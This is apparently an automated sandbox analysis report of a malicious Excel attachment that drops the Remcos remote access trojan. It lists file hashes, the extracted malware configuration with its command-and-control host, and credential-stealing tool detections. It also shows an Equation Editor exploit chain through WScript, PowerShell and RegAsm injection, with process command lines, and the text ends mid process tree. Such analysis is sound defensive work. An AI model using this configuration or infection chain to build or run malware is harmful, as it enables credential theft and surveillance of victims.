remcos | fd363c89da6fb751baac4db6bc4d1cc302c88e1efeba1bfab397a627d4c1eead

Analysis

max time kernel
147s
max time network
150s
platform
windows7_x64
resource
win7-20240221-en
resource tags

arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system
submitted
16-04-2024 15:25

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

OFFER DETAIL 75645.xls
Size

319KB
MD5

1dc1fa973594e14e2b517f281400941f
SHA1

1565eb8c6dc5248ecd19cfe4ff1cb6c33541ed1e
SHA256

fd363c89da6fb751baac4db6bc4d1cc302c88e1efeba1bfab397a627d4c1eead
SHA512

90e146ad9faa2acc760511fbdeed8c6883bbb274a158349ac995714709d77374789f77454e1bb818477274e0c60eb90684bcad3da3daa46f9d558861cf307669
SSDEEP

6144:xLunJatY35qAOJl/YrLYz+WrNhZF+E+fgL+0dD8ivSbVX2MIMflDClBnPlWjIKw8:xmJaU3bVX2MIuVC7ntWjIKN

Score

10^/10

remcos remotehost collection persistence rat spyware stealer

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

ezege.duckdns.org:14645

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
remcos.exe
copy_folder
Remcos
delete_file
false
hide_file
false
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-IVESQI
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

NirSoft MailPassView 3 IoCs

Password recovery tool for various email clients

Processes:

resource	yara_rule
behavioral1/memory/2992-286-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2992-285-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView
behavioral1/memory/2992-297-0x0000000000400000-0x0000000000462000-memory.dmp	MailPassView

NirSoft WebBrowserPassView 3 IoCs

Password recovery tool for various web browsers

Processes:

resource	yara_rule
behavioral1/memory/2928-288-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2928-283-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView
behavioral1/memory/2928-294-0x0000000000400000-0x0000000000478000-memory.dmp	WebBrowserPassView

Nirsoft 8 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2992-286-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2928-288-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2992-285-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/2928-283-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2928-294-0x0000000000400000-0x0000000000478000-memory.dmp	Nirsoft
behavioral1/memory/2992-297-0x0000000000400000-0x0000000000462000-memory.dmp	Nirsoft
behavioral1/memory/1288-305-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft
behavioral1/memory/1288-309-0x0000000000400000-0x0000000000424000-memory.dmp	Nirsoft

Blocklisted process makes network request 6 IoCs

Processes:

EQNEDT32.EXEWScript.exepowershell.exe

flow pid process

19 2780 EQNEDT32.EXE
22 2520 WScript.exe
24 688 powershell.exe
26 688 powershell.exe
28 688 powershell.exe
29 688 powershell.exe
Abuses OpenXML format to download file from external location
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials In Files
T1552.001

flow	pid	process
19	2780	EQNEDT32.EXE
22	2520	WScript.exe
24	688	powershell.exe
26	688	powershell.exe
28	688	powershell.exe
29	688	powershell.exe

Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs

collection

Email Collection

T1114

Processes:

RegAsm.exe

description	ioc	process
Key opened	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts	RegAsm.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Windows\CurrentVersion\Run\Path = "C:\\ProgramData\\CCHN.vbs"	powershell.exe

Drops file in System32 directory 3 IoCs

Processes:

powershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Suspicious use of SetThreadContext 4 IoCs

Processes:

powershell.exeRegAsm.exe

description	pid	process	target process
PID 688 set thread context of 2640	688	powershell.exe	RegAsm.exe
PID 2640 set thread context of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 set thread context of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 set thread context of 1288	2640	RegAsm.exe	RegAsm.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Office loads VBA resources, possible macro or embedded object present
Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry
T1012

System Information Discovery
T1082

Processes:

EXCEL.EXE

description ioc process

Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE
Launches Equation Editor 1 TTPs 1 IoCs
Equation Editor is an old Office component often targeted by exploits such as CVE-2017-11882.
exploit

Exploitation for Client Execution
T1203

Processes:

EQNEDT32.EXE

pid process

2780 EQNEDT32.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

pid	process
2780	EQNEDT32.EXE

Modifies Internet Explorer settings 1 TTPs 31 IoCs

adware spyware

Modify Registry

T1112

Processes:

EXCEL.EXEWINWORD.EXE

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel	EXCEL.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1"	EXCEL.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes"	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\COMMAND	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command	WINWORD.EXE
Set value (int)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor\shell\edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default MHTML Editor	WINWORD.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\Toolbar	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt	EXCEL.EXE
Key created	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote	EXCEL.EXE
Set value (str)	\REGISTRY\USER\S-1-5-21-1298544033-3225604241-2703760938-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000"	EXCEL.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Default HTML Editor\shell\edit\COMMAND	WINWORD.EXE

Modifies registry class 64 IoCs

Processes:

WINWORD.EXE

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\ = "[open(\"%1\")]"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\DefaultIcon\ = "\"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\MSPub.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\application\ = "Excel"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0045005800430045004c00460069006c00650073003e00560069006a00710042006f006600280059003800270077002100460049006400310067004c00510020002f0064006400650000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\EXCEL.EXE\" /dde"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Edit\ = "&Edit"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\command	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\WinWord.exe\shell\edit\command\ = "\"C:\\Program Files (x86)\\Microsoft Office\\Office14\\WINWORD.EXE\" /n \"%1\""	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version\14\ = "C:\\Program Files (x86)\\Microsoft Office\\Office14\\msohtmed.exe"	WINWORD.EXE
Key deleted	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\MSPub.exe\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\shell\Print\command	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit\ = "&Open"	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Publisher\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b005000750062005000720069006d006100720079003e00520024006e0075006a0053005700460065003f007d0061004c00720052007000390078004000570020002500310000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Word\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec\topic\ = "system"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{42042206-2D85-11D3-8CFF-005004838597}\Version	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Excel.exe\shell\edit\command	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile\ShellEx	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ = "&Open"	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Excel.exe\shell\edit\ddeexec\topic	WINWORD.EXE
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\WinWord.exe\shell\edit\command\command = 7800620027004200560035002100210021002100210021002100210021004d004b004b0053006b0057004f0052004400460069006c00650073003e00620069002400540021005600210030005a003d007b0050006b00300076006d007e0041005a00750020002f006e002000220025003100220000000000	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.htm\OpenWithList\Microsoft Publisher\shell\edit	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\mhtmlfile	WINWORD.EXE
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\.mht\OpenWithList\Microsoft Excel\shell\edit\ddeexec	WINWORD.EXE
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Classes\htmlfile\shell\Print\ = "&Print"	WINWORD.EXE

Suspicious behavior: AddClipboardFormatListener 1 IoCs

Processes:

EXCEL.EXE

pid process

1504 EXCEL.EXE
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

pid process

1484 powershell.exe
688 powershell.exe
2196 powershell.exe
2928 RegAsm.exe
2928 RegAsm.exe
Suspicious behavior: MapViewOfSection 4 IoCs

Processes:

RegAsm.exe

pid process

2640 RegAsm.exe
2640 RegAsm.exe
2640 RegAsm.exe
2640 RegAsm.exe

pid	process
1504	EXCEL.EXE

pid	process
1484	powershell.exe
688	powershell.exe
2196	powershell.exe
2928	RegAsm.exe
2928	RegAsm.exe

pid	process
2640	RegAsm.exe
2640	RegAsm.exe
2640	RegAsm.exe
2640	RegAsm.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

Processes:

powershell.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process
Token: SeDebugPrivilege	1484	powershell.exe
Token: SeDebugPrivilege	688	powershell.exe
Token: SeDebugPrivilege	2196	powershell.exe
Token: SeDebugPrivilege	1288	RegAsm.exe

Suspicious use of SetWindowsHookEx 5 IoCs

Processes:

EXCEL.EXEWINWORD.EXE

pid process

1504 EXCEL.EXE
1504 EXCEL.EXE
1504 EXCEL.EXE
2604 WINWORD.EXE
2604 WINWORD.EXE

pid	process
1504	EXCEL.EXE
1504	EXCEL.EXE
1504	EXCEL.EXE
2604	WINWORD.EXE
2604	WINWORD.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

EQNEDT32.EXEWINWORD.EXEWScript.exepowershell.exepowershell.exeRegAsm.exe

description	pid	process	target process
PID 2780 wrote to memory of 2520	2780	EQNEDT32.EXE	WScript.exe
PID 2780 wrote to memory of 2520	2780	EQNEDT32.EXE	WScript.exe
PID 2780 wrote to memory of 2520	2780	EQNEDT32.EXE	WScript.exe
PID 2780 wrote to memory of 2520	2780	EQNEDT32.EXE	WScript.exe
PID 2604 wrote to memory of 2868	2604	WINWORD.EXE	splwow64.exe
PID 2604 wrote to memory of 2868	2604	WINWORD.EXE	splwow64.exe
PID 2604 wrote to memory of 2868	2604	WINWORD.EXE	splwow64.exe
PID 2604 wrote to memory of 2868	2604	WINWORD.EXE	splwow64.exe
PID 2520 wrote to memory of 1484	2520	WScript.exe	powershell.exe
PID 2520 wrote to memory of 1484	2520	WScript.exe	powershell.exe
PID 2520 wrote to memory of 1484	2520	WScript.exe	powershell.exe
PID 2520 wrote to memory of 1484	2520	WScript.exe	powershell.exe
PID 1484 wrote to memory of 688	1484	powershell.exe	powershell.exe
PID 1484 wrote to memory of 688	1484	powershell.exe	powershell.exe
PID 1484 wrote to memory of 688	1484	powershell.exe	powershell.exe
PID 1484 wrote to memory of 688	1484	powershell.exe	powershell.exe
PID 688 wrote to memory of 2196	688	powershell.exe	powershell.exe
PID 688 wrote to memory of 2196	688	powershell.exe	powershell.exe
PID 688 wrote to memory of 2196	688	powershell.exe	powershell.exe
PID 688 wrote to memory of 2196	688	powershell.exe	powershell.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 688 wrote to memory of 2640	688	powershell.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2928	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2992	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 2972	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 1288	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 1288	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 1288	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 1288	2640	RegAsm.exe	RegAsm.exe
PID 2640 wrote to memory of 1288	2640	RegAsm.exe	RegAsm.exe

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\OFFER DETAIL 75645.xls"
1⤵
- Enumerates system info in registry
- Modifies Internet Explorer settings
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:1504

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" -Embedding
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2604

C:\Windows\splwow64.exe
C:\Windows\splwow64.exe 12288
2⤵
PID:2868

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
1⤵
- Blocklisted process makes network request
- Launches Equation Editor
- Suspicious use of WriteProcessMemory
PID:2780

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\imageiloveyoutruly.vbs"
2⤵
